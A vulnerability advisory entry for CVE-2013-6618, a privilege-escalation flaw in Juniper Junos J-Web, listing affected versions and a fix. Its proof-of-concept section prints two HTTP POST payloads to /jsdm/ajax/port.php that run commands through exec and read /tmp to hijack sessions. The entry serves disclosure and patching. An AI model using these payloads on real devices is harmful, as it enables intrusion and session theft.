Juniper Junos J-Web Privilege Escalation Vulnerability
BID:62305
Info
Juniper Junos J-Web Privilege Escalation Vulnerability
| Bugtraq ID: | 62305 |
| Class: | Design Error |
| CVE: |
CVE-2013-6618 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2013 12:00AM |
| Updated: | Oct 10 2014 12:03AM |
| Credit: | Phil of Sense of Security |
| Vulnerable: |
Juniper Networks JUNOS 10.4 Juniper Networks JUNOS 10.3 Juniper Networks JUNOS 10.2R3 Juniper Networks JUNOS 10.2R2 Juniper Networks JUNOS 10.2 Juniper Networks JUNOS 10.1 Juniper Networks JUNOS 10.0S18 Juniper Networks JUNOS 10.0 |
| Not Vulnerable: | |
Discussion
Juniper Junos J-Web Privilege Escalation Vulnerability
Juniper Junos is prone to a privilege-escalation vulnerability.
An attacker can exploit this vulnerability to execute arbitrary code with elevated privileges.
Versions prior to Juniper Junos 10.4R13 are vulnerable.
Juniper Junos is prone to a privilege-escalation vulnerability.
An attacker can exploit this vulnerability to execute arbitrary code with elevated privileges.
Versions prior to Juniper Junos 10.4R13 are vulnerable.
Exploit / POC
Juniper Junos J-Web Privilege Escalation Vulnerability
The following proof-of-concept code is available:
POST /jsdm/ajax/port.php
rs=exec&rsargs[]=echo â??helloâ?
Read /tmp and hijack a session
POST /jsdm/ajax/port.php
rs=file_get_contents&rsargs[]=/tmp
The following proof-of-concept code is available:
POST /jsdm/ajax/port.php
rs=exec&rsargs[]=echo â??helloâ?
Read /tmp and hijack a session
POST /jsdm/ajax/port.php
rs=file_get_contents&rsargs[]=/tmp
Solution / Fix
Juniper Junos J-Web Privilege Escalation Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Juniper Junos J-Web Privilege Escalation Vulnerability
References:
References:
- Juniper Networks Homepage (Juniper Networks)